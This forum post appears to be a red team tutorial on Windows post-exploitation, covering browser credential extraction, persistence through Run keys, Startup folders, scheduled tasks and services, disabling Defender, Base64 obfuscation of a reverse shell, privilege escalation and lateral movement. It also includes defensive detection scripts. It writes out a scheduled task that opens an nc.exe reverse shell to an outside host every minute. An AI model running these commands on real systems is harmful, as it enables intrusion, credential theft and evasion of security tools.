
Pentest Red Team Infrastructure

SharpChromium

SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract:

  • Cookies (in JSON format)
  • History (with associated cookies for each history item)
  • Saved Logins

A small demonstration of saved credentials for the Edge web browser; these can be extracted with user-level permissions.

(Heads up: the credentials are stored even if they were incorrect!)
image
 

Persistence

As MITRE defines it:

The adversary is trying to maintain its foothold.

In this section, I will demonstrate a few user-level and administrator-level persistence methods for keeping a foothold in the target environment.
 

Userland Persistence

These methods are achievable with user-level permissions only: the operator has no access to anything that requires administrator privileges, but some techniques can still be carried out as a user.

There are two categories of registry keys, the SYSTEM keys and the USER keys. The user has access to edit the user keys and modify them as they like; the ones worth mentioning are the Run and RunOnce keys, which are useful because whatever they reference executes the next time the user logs on, for example after logging out or restarting the machine.

An example of this technique using cmd follows. It registers a binary on disk, but the value data can just as well be a command line to execute instead. The key path must be exact (including \Windows\), otherwise the value lands under an unrelated key and nothing executes at logon.

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v 1 /d "C:\Windows\System32\calc.exe"

image

We can verify that the value was created in the registry:

image

Once added successfully, the binary should execute when the user logs back on to the workstation, whether after locking the session or restarting:

image

Demo:

The Startup folder contains programs that launch once a user has logged on to their session. This is another good method for user persistence, since the user has write permissions on their own Startup folder.

A simple .bat file left in the user's Startup folder will execute the next time the user logs on:

image

Demo:

image



Utilities such as schtasks can schedule programs or scripts to execute at a date and time specified by the user. Operators can use this feature to have a command or binary run at a set time of day and so receive their persistent shell from the workstation:

schtasks /create /sc minute /mo 1 /tn "Taxes" /tr C:\Windows\System32\calc.exe

image

Demo:

Scheduled Task​

Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the remote system.

An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote execution as part of lateral movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.

Let's create a task that keeps a reverse shell alive every minute:

schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr "C:\Users\User\Downloads\nc.exe 192.168.56.103 1337 -e cmd.exe"

image

As we can see, creating a task uses a simple syntax. I demonstrated it with the nc.exe binary, which also takes arguments; all that was needed was to place the whole command line inside double quotes ("") so that it accepts arguments with spaces. These tasks can also be created remotely; all that is needed is for the user to be an administrator or to have the proper permissions on the remote machine.

In the schtasks help menu we see the arguments needed after /create to create a task on a remote server. We can supply the username and password as arguments to authenticate and create the task.

It would look something like this:

schtasks /create /s "PC-NAME" /tn "My App" /tr "PATH" /sc minute /mo 1 /u Domain\User /p password   [if /p is omitted, schtasks prompts for the password]

image
 

Elevated Persistence

These methods apply once the operator has elevated their privileges on the workstation. They are helpful to avoid repeating the privilege escalation and simply come back to a higher-privileged shell.

Note: These require privilege escalation beforehand to achieve this level of persistence.

Services

Services are created with Administrator privileges, but they execute with SYSTEM-level privileges. Services can also be started on demand through Service Execution.

The permission level required to create a service is shown below:

image

But once elevated to the Administrator level:

image

Our service has been successfully created and is currently stopped; we will proceed to start the service:

image

Even when starting the service times out or returns an error, the payload has still executed. This usually happens when the binary path is replaced with a command instead of a proper service binary:

image

All persistence methods are available at this level of access on the workstation; I just wanted to demonstrate one that is easy to show when Administrator access is required.
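As a defender's counterpart to the Run key, Startup folder, scheduled task and service techniques above, here is a small triage script that classifies persistence-looking records. It is an added example, not code from the post or from any tool it names; the event records are constructed samples shaped like Sysmon Event ID 13 (registry value set), Sysmon Event ID 11 (file created), Security 4698 (scheduled task created, with the task XML in TaskContent) and Security 4697 (service installed). The "user-writable path" heuristic and the five-minute repetition threshold are assumptions chosen for the example.

```python
"""Flag common Windows persistence mechanisms in event-log records.

Added example, not part of the original post. Records are CONSTRUCTED
samples shaped like Sysmon EID 13 (registry value set), Sysmon EID 11
(file created), Security 4698 (scheduled task created) and Security 4697
(service installed); field names follow those schemas, values are made
up. A real 4698 TaskContent starts with an XML declaration, omitted here.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# ...\CurrentVersion\Run\<name> and ...\CurrentVersion\RunOnce\<name>
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?(\\|$)", re.IGNORECASE)
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
# Trees a standard user can write to (assumption for this example); a payload
# here is more suspicious than one under System32 or Program Files.
USER_WRITABLE_RE = re.compile(
    r"^[a-z]:\\(users\\|programdata\\|windows\\temp\\)", re.IGNORECASE)

TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT1M</Interval></Repetition>
  <StartBoundary>2024-01-01T09:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\Users\User\Downloads\nc.exe</Command>
  <Arguments>placeholder-arguments</Arguments></Exec></Actions>
</Task>"""

SAMPLE_EVENTS = [  # constructed
    {"RecordId": 1, "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\1",
     "Details": r"C:\Users\User\Downloads\update.exe"},
    {"RecordId": 2, "EventID": 13,  # benign registry write, not a Run key
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
    {"RecordId": 3, "EventID": 11,
     "TargetFilename": r"C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat"},
    {"RecordId": 4, "EventID": 4698, "TaskContent": TASK_XML},
    {"RecordId": 5, "EventID": 4697, "ServiceFileName": r"C:\Users\Public\svc.exe"},
    {"RecordId": 6, "EventID": 4697, "ServiceFileName": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]


def in_user_writable(path: str) -> bool:
    """True if the (possibly quoted, argument-bearing) path starts in a user-writable tree."""
    return bool(USER_WRITABLE_RE.match(path.strip().lstrip('"')))


def iso_duration_seconds(value: str) -> int:
    """Convert a Task Scheduler ISO 8601 duration such as PT1M or PT2H30M to seconds."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m:
        return 0
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def classify(event: dict):
    """Return (technique, reason) when the record looks like persistence, else None."""
    eid = event["EventID"]
    if eid == 13 and RUN_KEY_RE.search(event["TargetObject"]):
        why = "Run/RunOnce value set"
        if in_user_writable(event["Details"]):
            why += " to a user-writable path"
        return ("registry_run_key", why)
    if eid == 11 and STARTUP_RE.search(event["TargetFilename"]):
        return ("startup_folder", "file dropped in a Startup folder")
    if eid == 4698:
        root = ET.fromstring(event["TaskContent"])
        cmd = root.findtext(".//t:Exec/t:Command", default="", namespaces=TASK_NS)
        interval = root.findtext(".//t:Repetition/t:Interval", default="", namespaces=TASK_NS)
        reasons = []
        if in_user_writable(cmd):
            reasons.append("task runs a user-writable binary")
        if 0 < iso_duration_seconds(interval) <= 300:   # tight beaconing-style repetition
            reasons.append(f"repeats every {interval}")
        if reasons:
            return ("scheduled_task", "; ".join(reasons))
    if eid == 4697 and in_user_writable(event["ServiceFileName"]):
        return ("service_install", "service binary in a user-writable path")
    return None


def scan(events):
    """Run classify() over a batch and return the findings as dicts."""
    findings = []
    for ev in events:
        hit = classify(ev)
        if hit:
            findings.append({"record": ev["RecordId"], "technique": hit[0], "reason": hit[1]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f)
```

Records 1, 3, 4 and 5 are reported; the Explorer setting and the svchost service are not. In practice the same four event sources are the ones to forward to a SIEM for the techniques in this section, and the path heuristic is a starting point to tune against your own software inventory.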
 

Defense Evasion

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.

A few techniques will be demonstrated in the following sections; they may not be OPSEC-safe, but they are available.
 

Disable or Modify Tools

Attackers with elevated permissions can disable security tools to avoid detection of the activities being monitored.

We can verify that Defender is blocking our malicious attempts:

image

We can disable Defender using PowerShell, Services, or even GPO policies; an example is shown below:

image

Then, after disabling:

image

Note: Tamper Protection blocks this action; alternative routes are GPO or registry keys.

After disabling, malicious attempts are able to execute:

image
 

Obfuscating Files

To obfuscate a file is to make it obscure, unclear, or unintelligible. A simple example is converting our strings into Base64 encoding. This is not encryption and does not break the functionality of our code, but it is a way to hide malicious payloads from AVs scanning for malicious strings (AVs are smart and can also decode simple Base64 and scan the real string).

I will work with a simple reverse shell PowerShell script from Nishang:

image

Saving the file immediately got it flagged:

image

A little trick I've noticed (this technique is not new): Defender flags a lot of malicious words in English, so what if we change them to Spanish?

image

Now let's encode the entire script into Base64. PowerShell expects a specific Base64 format, so we need to set these options so that they apply to the whole text of the script:

image

We can copy and paste this Base64 blob and run it correctly.

Demo:



image
 

Privilege Escalation

In this section, I will demonstrate some tools and techniques for elevating your privileges on a workstation. Some are very well known, and they make it simple and automated to find the misconfigurations in an environment that allow us as operators to elevate our context to a higher one, such as Administrator.
 

PowerUp

PowerUp has been out for a while: a great PowerShell script that looks for the typical out-of-place configurations that can allow a regular user access to resources they shouldn't have. This tool has not been updated in a while, especially the PowerShell script version, but we can use the C# one, which is actively maintained.

Running it is straightforward. In its help menu we want to use all checks available and get the results, so the audit parameter is the one we use; we wait for it to finish, and we can see it has found a vulnerable configuration:

image

To take advantage of this, we see that two registry keys are enabled that allow us to install MSI packages with elevated permissions; we are mostly interested in the user key, since we should be in that context.

We can create a simple payload with msfvenom to build an MSI package, or use Visual Studio to create a custom one.

To take advantage of this, we drop our MSI payload on the workstation, use the msiexec LOLBAS, and gain a shell with elevated permissions:

image

Here is a small demo of this technique.

Demo:

image
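The two registry keys PowerUp reports are the AlwaysInstallElevated policy under HKLM and HKCU, and the caveat a practitioner wants is that the policy only takes effect when it is set to 1 in both hives; one hive alone is not exploitable, and clearing either one removes the condition. The auditor below is an added example, not PowerUp's code; the `reg query` output it parses is constructed, and the remediation lines it emits are the assumed fix (setting both values to 0, which GPO would normally manage).

```python
r"""Audit the AlwaysInstallElevated policy from `reg query` output.

Added example; not PowerUp's code. A standard user can only install an
MSI with SYSTEM privileges when AlwaysInstallElevated is 1 under BOTH
HKLM and HKCU, so both hives must be read before calling a host
vulnerable. The strings below are CONSTRUCTED to look like the output of
  reg query <hive>\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
"""
import re

POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-f]+)\s*$",
                      re.IGNORECASE | re.MULTILINE)

# Constructed samples of what reg query prints.
HKLM_ON = "\nHKEY_LOCAL_MACHINE\\" + POLICY_KEY + "\n    AlwaysInstallElevated    REG_DWORD    0x1\n\n"
HKCU_ON = "\nHKEY_CURRENT_USER\\" + POLICY_KEY + "\n    AlwaysInstallElevated    REG_DWORD    0x1\n\n"
HKCU_OFF = "\nHKEY_CURRENT_USER\\" + POLICY_KEY + "\n    AlwaysInstallElevated    REG_DWORD    0x0\n\n"
MISSING = "ERROR: The system was unable to find the specified registry key or value.\n"


def parse_value(output: str):
    """Return the DWORD as an int, or None when the key or value is absent."""
    m = VALUE_RE.search(output)
    return int(m.group(1), 16) if m else None


def assess(hklm_output: str, hkcu_output: str) -> dict:
    """Combine both hives: 'vulnerable' only when both are 1, 'partial' when one is."""
    hklm = parse_value(hklm_output)
    hkcu = parse_value(hkcu_output)
    if hklm == 1 and hkcu == 1:
        state = "vulnerable"
    elif 1 in (hklm, hkcu):
        state = "partial"      # not exploitable as-is, but one GPO change away
    else:
        state = "clean"
    remediation = []
    if state != "clean":
        for hive in ("HKLM", "HKCU"):
            remediation.append(
                f"reg add {hive}\\{POLICY_KEY} /v AlwaysInstallElevated /t REG_DWORD /d 0 /f")
    return {"hklm": hklm, "hkcu": hkcu, "state": state, "remediation": remediation}


if __name__ == "__main__":
    print(assess(HKLM_ON, HKCU_ON))
```

Run it against the real output of the two `reg query` commands on a host under review; a "partial" result is worth fixing too, since the missing half is a single policy change away.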
 

PrivescCheck

PrivescCheck is an amazing PowerShell script that looks for multiple vulnerable configurations, cleartext credentials, and missing patches that can allow the operator to elevate privileges on the workstation. It is currently only in C#, but it is actively maintained and well worked on.

In this example, I will demonstrate SeImpersonatePrivilege; with it, the user is allowed to impersonate another user or account and act on their behalf.

Running PrivescCheck shows this privilege as True:

image



TL;DR

PrintSpoofer abuses this privilege: it creates a pipe, has the local SYSTEM account try to authenticate to it, and impersonates the resulting token.

image

A demonstration of exploiting this privilege:

image
 

Lateral Movement

Lateral movement is when our operator tries to jump from one workstation to another. In this section situational awareness plays a big role: if our operator cannot locate workstations or identify the services, configurations, or applications running in the environment, we won't be able to figure out the next logical or stealthier way to blend in when moving from one box to another. A few techniques demonstrating this step will be shown.
 

RDP

Remote Desktop Protocol is a GUI interface that Microsoft built for users accessing a remote workstation, usually running on port 3389. It is great for employees in remote locations who need to reach the network environment.

Usually, to jump between workstations over RDP a user must have special permissions to remote onto another box with the current user's permissions; on the other hand, Domain Admins or local Administrators of the box can RDP.

The following demonstration shows the use of RDP as lateral movement.

The attacker box RDPs into the user's workstation:

image

Our enumeration says that the HelpDesk user has permission to RDP onto the Desktop-Bravo workstation from the Desktop-Alpha workstation, so we enter that user's credentials:

image

And we have successfully moved from Alpha to Bravo via RDP:

image
 

PowerShell Remoting

Using the WS-Management protocol, Windows PowerShell remoting lets you run any Windows PowerShell command on one or more remote computers. You can establish persistent connections, start interactive sessions, and run scripts on remote computers.

When we have access to the internal network, PowerShell has a cmdlet to check whether PS Remoting is available on a remote host:

image

From outside the network, the usual port for this connection is 5985; it can be changed so that attackers scanning for common open ports do not find it:

image

From outside the network, an amazing tool named evil-winrm lets us take advantage of this protocol:

image

Internal access lets us connect to a different workstation. We can authenticate in various ways, but I used the approach of running as a different user with the runas command; the user can then simply access a PSSession on the remote workstation, as seen below:

image
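Both hops shown in this section, the RDP jump from Desktop-Alpha to Desktop-Bravo and the PSSession to a remote workstation, leave a distinctive trace on the target: a Security 4624 logon with LogonType 10 whose WorkstationName is another workstation, and (for PowerShell Remoting) a Security 4688 process creation of wsmprovhost.exe, the host process that serves the remote session. The detector below is an added example, not code from the post; the records are constructed, and it assumes workstation names begin with "DESKTOP-" so that workstation-to-workstation sessions can be separated from the normal workstation-to-server ones.

```python
"""Spot workstation-to-workstation RDP and PowerShell Remoting in Windows events.

Added example, not from the original post. Records are CONSTRUCTED in the
shape of Security 4624 (logon) and 4688 (process creation) fields, using
the post's Desktop-Alpha / Desktop-Bravo naming. Assumptions: workstation
names start with "DESKTOP-", and sessions between two workstations are
unusual enough to review, while hops to servers are expected and ignored.
"""
import re

WORKSTATION_RE = re.compile(r"^desktop-", re.IGNORECASE)
RDP_LOGON_TYPE = 10                        # RemoteInteractive
WINRM_HOST_PROCESS = "\\wsmprovhost.exe"   # spawned on the target for each remote session

SAMPLE_EVENTS = [  # constructed
    {"EventID": 4624, "Computer": "DESKTOP-BRAVO", "LogonType": 10, "TargetUserName": "HelpDesk",
     "WorkstationName": "DESKTOP-ALPHA", "IpAddress": "10.0.0.11"},
    {"EventID": 4624, "Computer": "DESKTOP-ALPHA", "LogonType": 2, "TargetUserName": "HelpDesk",
     "WorkstationName": "DESKTOP-ALPHA", "IpAddress": "-"},          # console logon, ignored
    {"EventID": 4624, "Computer": "DESKTOP-ALPHA", "LogonType": 3, "TargetUserName": "DESKTOP-ALPHA$",
     "WorkstationName": "-", "IpAddress": "-"},                       # machine account, ignored
    {"EventID": 4624, "Computer": "SRV-FILES01", "LogonType": 10, "TargetUserName": "admin",
     "WorkstationName": "DESKTOP-ALPHA", "IpAddress": "10.0.0.11"},  # RDP to a server, ignored
    {"EventID": 4688, "Computer": "DESKTOP-BRAVO", "SubjectUserName": "HelpDesk",
     "NewProcessName": r"C:\Windows\System32\wsmprovhost.exe"},
    {"EventID": 4688, "Computer": "DESKTOP-BRAVO", "SubjectUserName": "HelpDesk",
     "NewProcessName": r"C:\Windows\System32\notepad.exe"},           # ordinary process, ignored
]


def is_workstation(name: str) -> bool:
    """Apply the naming assumption to a host name (FQDN or short)."""
    return bool(WORKSTATION_RE.match(name.split(".")[0]))


def lateral_findings(events):
    """Return one finding per workstation-to-workstation RDP logon or WinRM session host."""
    findings = []
    for ev in events:
        if ev["EventID"] == 4624 and ev["LogonType"] == RDP_LOGON_TYPE:
            if is_workstation(ev["Computer"]) and is_workstation(ev["WorkstationName"]):
                findings.append({"technique": "rdp", "user": ev["TargetUserName"],
                                 "src": ev["WorkstationName"], "dst": ev["Computer"]})
        elif ev["EventID"] == 4688 and ev["NewProcessName"].lower().endswith(WINRM_HOST_PROCESS):
            if is_workstation(ev["Computer"]):
                # 4688 does not carry the client name; the 4624 LogonType 3 on this host does.
                findings.append({"technique": "winrm", "user": ev["SubjectUserName"],
                                 "src": None, "dst": ev["Computer"]})
    return findings


def hops_by_user(findings):
    """Summarise which workstations each account reached, for an analyst's first look."""
    summary = {}
    for f in findings:
        summary.setdefault(f["user"], set()).add(f["dst"])
    return {user: sorted(hosts) for user, hosts in summary.items()}


if __name__ == "__main__":
    for f in lateral_findings(SAMPLE_EVENTS):
        print(f)
    print(hops_by_user(lateral_findings(SAMPLE_EVENTS)))
```

Of the six constructed records only the RDP logon onto DESKTOP-BRAVO and the wsmprovhost.exe start on the same host are reported. The port change mentioned above for WinRM does not affect this logic, since both events are recorded on the target regardless of the listening port.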
 
wow... it does not go into the deep but it is outstanding work.... I can really find things that took me a lot to figure out..... outstanding work again. I'm impressed to find this knowledge on a forum, wish I could have found this forum a few years back.
 